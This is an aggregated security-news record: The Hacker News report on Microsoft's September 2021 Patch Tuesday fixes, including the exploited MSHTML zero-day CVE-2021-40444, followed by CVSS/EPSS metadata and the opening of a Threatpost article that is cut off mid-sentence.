Microsoft Releases Patch for Actively Exploited Windows Zero-Day Vulnerability

2021-09-15T05:00:00

Description

[![](https://thehackernews.com/images/-n2LTDkSYrUk/YUF8P0ggXPI/AAAAAAAADzE/Jk_5Hbl3Sf4AUwjPizqDaRZLrxWgrDizgCLcBGAsYHQ/s0/windows-update-download.jpg)](<https://thehackernews.com/images/-n2LTDkSYrUk/YUF8P0ggXPI/AAAAAAAADzE/Jk_5Hbl3Sf4AUwjPizqDaRZLrxWgrDizgCLcBGAsYHQ/s0/windows-update-download.jpg>) A day after [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) and [Google](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) rolled out urgent security updates, Microsoft has [pushed software fixes](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Sep>) as part of its monthly Patch Tuesday release cycle to plug 66 security holes affecting Windows and other components such as Azure, Office, BitLocker, and Visual Studio, including an [actively exploited zero-day](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) in its MSHTML Platform that came to light last week. Of the 66 flaws, three are rated Critical, 62 are rated Important, and one is rated Moderate in severity. This is aside from the [20 vulnerabilities](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Microsoft Edge browser that the company addressed since the start of the month. The most important of the updates concerns a patch for [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8), an actively exploited remote code execution vulnerability in MSHTML that leverages malware-laced Microsoft Office documents, with EXPMON researchers noting "the exploit uses logical flaws so the exploitation is perfectly reliable." Also addressed is a publicly disclosed, but not actively exploited, zero-day flaw in Windows DNS. Designated as [CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>), the elevation of privilege vulnerability is rated 7.8 in severity. Other flaws of note resolved by Microsoft involve a number of remote code execution bugs in Open Management Infrastructure ([CVE-2021-38647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647>)), Windows WLAN AutoConfig Service ([CVE-2021-36965](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965>)), Office ([CVE-2021-38659](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38659>)), Visual Studio ([CVE-2021-36952](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36952>)), and Word ([CVE-2021-38656](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38656>)) as well as a memory corruption flaw in Windows Scripting Engine ([CVE-2021-26435](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26435>)) What's more, the Windows maker has rectified three privilege escalation flaws newly uncovered in its Print Spooler service ([CVE-2021-38667](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38667>), [CVE-2021-38671](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38671>), and [CVE-2021-40447](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40447>)), while [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36975>) and [CVE-2021-38639](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38639>) (CVSS scores: 7.8), both of which relate to an elevation of privilege vulnerabilities in Win32k, are listed as 'exploitation more likely,' making it imperative that users move quickly to apply the security updates. ### Software Patches From Other Vendors Besides Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including - * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>) * [Android](<https://source.android.com/security/bulletin/2021-09-01>) * [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>) * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>) * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-September/thread.html>) * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405>) * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>) Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.

{"id": "THN:67ECC712AB360F5A56F2434CDBF6B51F", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Microsoft Releases Patch for Actively Exploited Windows Zero-Day Vulnerability", "description": "[![](https://thehackernews.com/images/-n2LTDkSYrUk/YUF8P0ggXPI/AAAAAAAADzE/Jk_5Hbl3Sf4AUwjPizqDaRZLrxWgrDizgCLcBGAsYHQ/s0/windows-update-download.jpg)](<https://thehackernews.com/images/-n2LTDkSYrUk/YUF8P0ggXPI/AAAAAAAADzE/Jk_5Hbl3Sf4AUwjPizqDaRZLrxWgrDizgCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nA day after [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) and [Google](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) rolled out urgent security updates, Microsoft has [pushed software fixes](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Sep>) as part of its monthly Patch Tuesday release cycle to plug 66 security holes affecting Windows and other components such as Azure, Office, BitLocker, and Visual Studio, including an [actively exploited zero-day](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) in its MSHTML Platform that came to light last week. \n\nOf the 66 flaws, three are rated Critical, 62 are rated Important, and one is rated Moderate in severity. This is aside from the [20 vulnerabilities](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Microsoft Edge browser that the company addressed since the start of the month.\n\nThe most important of the updates concerns a patch for [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8), an actively exploited remote code execution vulnerability in MSHTML that leverages malware-laced Microsoft Office documents, with EXPMON researchers noting \"the exploit uses logical flaws so the exploitation is perfectly reliable.\"\n\nAlso addressed is a publicly disclosed, but not actively exploited, zero-day flaw in Windows DNS. Designated as [CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>), the elevation of privilege vulnerability is rated 7.8 in severity.\n\nOther flaws of note resolved by Microsoft involve a number of remote code execution bugs in Open Management Infrastructure ([CVE-2021-38647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647>)), Windows WLAN AutoConfig Service ([CVE-2021-36965](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965>)), Office ([CVE-2021-38659](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38659>)), Visual Studio ([CVE-2021-36952](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36952>)), and Word ([CVE-2021-38656](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38656>)) as well as a memory corruption flaw in Windows Scripting Engine ([CVE-2021-26435](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26435>))\n\nWhat's more, the Windows maker has rectified three privilege escalation flaws newly uncovered in its Print Spooler service ([CVE-2021-38667](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38667>), [CVE-2021-38671](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38671>), and [CVE-2021-40447](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40447>)), while [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36975>) and [CVE-2021-38639](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38639>) (CVSS scores: 7.8), both of which relate to an elevation of privilege vulnerabilities in Win32k, are listed as 'exploitation more likely,' making it imperative that users move quickly to apply the security updates.\n\n### Software Patches From Other Vendors\n\nBesides Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including -\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-09-01>)\n * [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-September/thread.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-09-15T05:00:00", "modified": "2021-09-15T05:00:22", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-26435", "CVE-2021-36952", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-36975", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38656", "CVE-2021-38659", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "immutableFields": [], "lastseen": "2022-05-09T12:37:18", "viewCount": 82, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0802ECEE-BB4C-4C5B-969C-32CB9808C281", "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "avleonov", "idList": ["AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "AVLEONOV:5945665DFA613F7707360C10CED8C916"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0550", "CPAI-2021-0554", "CPAI-2021-0592", "CPAI-2021-0684"]}, {"type": "cisa", "idList": ["CISA:82FAB13698D3611E1292062AD6C8B405", "CISA:C70D91615E3DC8B589B493118D474566"]}, {"type": "cve", "idList": ["CVE-2021-26435", "CVE-2021-36952", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-36975", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38656", "CVE-2021-38659", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"]}, {"type": "githubexploit", "idList": ["09412330-832C-538A-A226-61474048E41B", "0990FE6E-7DC3-559E-9B84-E739872B988C", "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "0E388E09-F00E-58B6-BEFE-026913357CE0", "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "111C9F44-593D-5E56-8040-615B48ED3E24", "1EC6324C-A18E-517A-9A55-F1C2D1BCA358", "24DE1902-4427-5442-BF63-7657293966E2", "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "54D698B4-9CF0-5D7F-88D2-1053A11EA7C3", "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "610ADCD3-C281-52D4-A546-467569FE3AC1", "64DFB465-6754-5E4B-B311-7668EDD4D962", "6BC80C90-569E-5084-8C0E-891F12F1805E", "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "7333A285-768C-5AD9-B64E-0EC75F075597", "745C9387-7E9D-5BA8-BC2D-5B3EF7DCE82A", "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "8217668C-9748-5511-8C01-7E933D69F872", "88EFCA30-5DED-59FB-A476-A92F53D1497E", "8B4EDA16-9E27-500D-B648-9C3AD4295562", "8B907536-B213-590D-81B9-32CF4A55322E", "8CD90173-6341-5FAD-942A-A9617561026A", "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "A6B7D4D8-4578-5AD8-961D-3BC35007FF29", "A99AB73C-8E46-5B9C-A402-F78F96EE2327", "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "B9C2639D-9C07-5F11-B663-C144F457A9F7", "BF40B403-9D06-5460-8B40-3FC2E56A4A07", "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "CE2FB7D7-ABCF-58F8-AACC-D0E6FEE8865A", "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "E06577DB-A581-55E1-968E-81430C294A84", "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "FA1DEEA0-A8AF-5C21-98E6-9D3379266529", "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "FF761088-559C-5E71-A5CD-196D4E4571B8"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hivepro", "idList": ["HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:E57DA2FED4B890B898EFA2B68C657043"]}, {"type": "ibm", "idList": ["1E405D4974F6EA8AB73C7DDA9E9B3B2FCA2359AF05B6CF7C124046402F2BC520"]}, {"type": "kaspersky", "idList": ["KLA12277", "KLA12278", "KLA12285", "KLA12286", "KLA12288", "KLA12289", "KLA12290", "KLA12297"]}, {"type": "kitploit", "idList": ["KITPLOIT:1624142243530526923", "KITPLOIT:2590785192528609562", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:5187040326820919368", "KITPLOIT:5230148353750207837", "KITPLOIT:698315176468431184", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-LOCAL-CVE_2021_38648_OMIGOD-", "MSF:EXPLOIT-LINUX-MISC-CVE_2021_38647_OMIGOD-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "mscve", "idList": ["MS:CVE-2021-26435", "MS:CVE-2021-36952", "MS:CVE-2021-36965", "MS:CVE-2021-36968", "MS:CVE-2021-36975", "MS:CVE-2021-38639", "MS:CVE-2021-38647", "MS:CVE-2021-38656", "MS:CVE-2021-38659", "MS:CVE-2021-38667", "MS:CVE-2021-38671", "MS:CVE-2021-40444", "MS:CVE-2021-40447"]}, {"type": "mskb", "idList": ["KB5005563", "KB5005565", "KB5005566", "KB5005568", "KB5005569", "KB5005573", "KB5005575", "KB5005606", "KB5005607", "KB5005613", "KB5005615", "KB5005618", "KB5005623", "KB5005627", "KB5005633"]}, {"type": "msrc", "idList": ["MSRC:69CC27233CB7711437A7019644E4AE73"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "nessus", "idList": ["AZURE_OPEN_MGMT_INFRA_1_6_8_1.NASL", "OMI_1_6_8_1.NASL", "OMI_CVE-2021-38647.NBIN", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005606.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_5005623.NASL", "SMB_NT_MS21_SEP_5005633.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SMB_NT_MS21_SEP_OFFICE.NASL", "SMB_NT_MS21_SEP_OFFICE_C2R.NASL", "SMB_NT_MS21_SEP_VISUAL_STUDIO.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164694", "PACKETSTORM:164925", "PACKETSTORM:165214", "PACKETSTORM:167317"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8C1A6CAF7B07CD1A38A8D65351756A2F", "RAPID7BLOG:8D4E5743B0CE5246D493CE7356B4972D", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046"]}, {"type": "saint", "idList": ["SAINT:A224EF4FDA8E067B5A4576A0BC6D6F10", "SAINT:B21EB0CE85BB4A8171AF59A4CF014F01", "SAINT:E5FBEA63E5EE8A91F5066541141037D1"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "thn", "idList": ["THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:69DC54E89A77C1E4E0DFE9C6EA3BAB48", "THN:8A60310AB796B7372A105B7C8811306B", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:BD014635C5F702379060A20290985162", "THN:C4188C7A44467E425407D33067C14094", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:E7762183A6F7B3DDB942D3F1F99748F6"]}, {"type": "threatpost", "idList": ["THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:FD28EAD589B45A1A4A7412632B25CEAB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "zdi", "idList": ["ZDI-21-1076", "ZDI-21-1082", "ZDI-21-1084"]}, {"type": "zdt", "idList": ["1337DAY-ID-36967", "1337DAY-ID-37024", "1337DAY-ID-37126"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "avleonov", "idList": ["AVLEONOV:5945665DFA613F7707360C10CED8C916"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0550", "CPAI-2021-0554", "CPAI-2021-0592"]}, {"type": "cisa", "idList": ["CISA:82FAB13698D3611E1292062AD6C8B405", "CISA:C70D91615E3DC8B589B493118D474566"]}, {"type": "cve", "idList": ["CVE-2021-26435", "CVE-2021-36952", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-36975", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38656", "CVE-2021-38659", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"]}, {"type": "githubexploit", "idList": ["8B907536-B213-590D-81B9-32CF4A55322E"]}, {"type": "kaspersky", "idList": ["KLA12277", "KLA12278", "KLA12285", "KLA12286", "KLA12288", "KLA12289", "KLA12290", "KLA12297"]}, {"type": "kitploit", "idList": ["KITPLOIT:1624142243530526923", "KITPLOIT:2590785192528609562", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:5187040326820919368", "KITPLOIT:5230148353750207837", "KITPLOIT:698315176468431184", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66"]}, {"type": "mmpc", "idList": ["MMPC:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "mscve", "idList": ["MS:CVE-2021-26435", "MS:CVE-2021-36952", "MS:CVE-2021-36965", "MS:CVE-2021-36968", "MS:CVE-2021-36975", "MS:CVE-2021-38639", "MS:CVE-2021-38647", "MS:CVE-2021-38656", "MS:CVE-2021-38659", "MS:CVE-2021-38667", "MS:CVE-2021-38671", "MS:CVE-2021-40444", "MS:CVE-2021-40447"]}, {"type": "mskb", "idList": ["KB5005565"]}, {"type": "msrc", "idList": ["MSRC:69CC27233CB7711437A7019644E4AE73"]}, {"type": "mssecure", "idList": ["MSSECURE:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "nessus", "idList": ["AZURE_OPEN_MGMT_INFRA_1_6_8_1.NASL", "OMI_1_6_8_1.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005606.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_5005623.NASL", "SMB_NT_MS21_SEP_5005633.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SMB_NT_MS21_SEP_VISUAL_STUDIO.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164694"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8C1A6CAF7B07CD1A38A8D65351756A2F", "RAPID7BLOG:8D4E5743B0CE5246D493CE7356B4972D", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046"]}, {"type": "saint", "idList": ["SAINT:B21EB0CE85BB4A8171AF59A4CF014F01"]}, {"type": "securelist", "idList": ["SECURELIST:63306FA6D056BD9A04969409AC790D84"]}, {"type": "talos", "idList": ["SAP"]}, {"type": "thn", "idList": ["THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:69DC54E89A77C1E4E0DFE9C6EA3BAB48", "THN:D4E86BD8938D3B2E15104CA4922A51F8"]}, {"type": "threatpost", "idList": ["THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:FD28EAD589B45A1A4A7412632B25CEAB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "zdi", "idList": ["ZDI-21-1076", "ZDI-21-1082", "ZDI-21-1084"]}, {"type": "zdt", "idList": ["1337DAY-ID-36967"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-26435", "epss": "0.000610000", "percentile": "0.237510000", "modified": "2023-03-17"}, {"cve": "CVE-2021-36952", "epss": "0.002450000", "percentile": "0.607600000", "modified": "2023-03-17"}, {"cve": "CVE-2021-36965", "epss": "0.013190000", "percentile": "0.838930000", "modified": "2023-03-17"}, {"cve": "CVE-2021-36968", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-36975", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38639", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38647", "epss": "0.974860000", "percentile": "0.999410000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38656", "epss": "0.002140000", "percentile": "0.577200000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38659", "epss": "0.002110000", "percentile": "0.572730000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38667", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38671", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-40444", "epss": "0.966120000", "percentile": "0.993300000", "modified": "2023-03-17"}, {"cve": "CVE-2021-40447", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}], "vulnersScore": 0.1}, "_state": {"dependencies": 1660004461, "score": 1684009192, "epss": 1679112172}, "_internal": {"score_hash": "89cd5286ddda6fb9ca808ffbb0d121e2"}}

{"threatpost": [{"lastseen": "2021-09-16T18:44:44", "description": "In [September\u2019s Patch Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability>) crop of security fixes, Microsoft released patches for 66 CVEs, three of which are rated critical, and one of which \u2013 the Windows MSHTML zero-day \u2013 has been under active attack for nearly two weeks.\n\nOne other bug is listed as publicly known but isn\u2019t (yet) being exploited. Immersive Labs\u2019 Kevin Breen, director of cyber threat research, observed that with only one CVE under active attack in the wild, it\u2019s \u201cquite a light Patch Tuesday\u201d \u2013 at least on the surface, that is.\n\nThe flaws were found in Microsoft Windows and Windows components, Microsoft Edge (Chromium, iOS, and Android), Azure, Office and Office Components, SharePoint Server, Microsoft Windows DNS and the Windows Subsystem for Linux.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nOf the 66 new CVEs patched today, three are rated critical, 62 are rated important, and one is rated moderate in severity.\n\nOver the past nine months of 2021, this is the seventh month in which Microsoft patched fewer than 100 CVEs, in stark contrast to 2020, when Redmond spent eight months gushing out more than 100 CVE patches per month. But while the overall number of vulnerabilities is lighter, the severity ratings have ticked up, as the [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb>) noted.\n\nSome observers pegged the top patching priority in this month\u2019s batch as being a fix for CVE-2021-40444: An important-rated vulnerability in Microsoft\u2019s MSHTML (Trident) engine that rates 8.8 out of 10 on the CVSS scale.\n\nDisclosed on Sept. 7, it\u2019s a painfully throbbing sore thumb, given that researchers developed a number of proof-of-concept (PoC) exploits showing how drop-dead simple it is to exploit, and attackers have been sharing guides on how to do just that.\n\n## Under Active Attack: CVE-2021-40444\n\nIt\u2019s been nearly two weeks since this serious, simple to exploit bug has been under active attack, and it\u2019s been nearly a week since attackers started to share blueprints on how to carry out an exploit.\n\nMicrosoft said last week that the flaw could let an attacker \u201ccraft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser 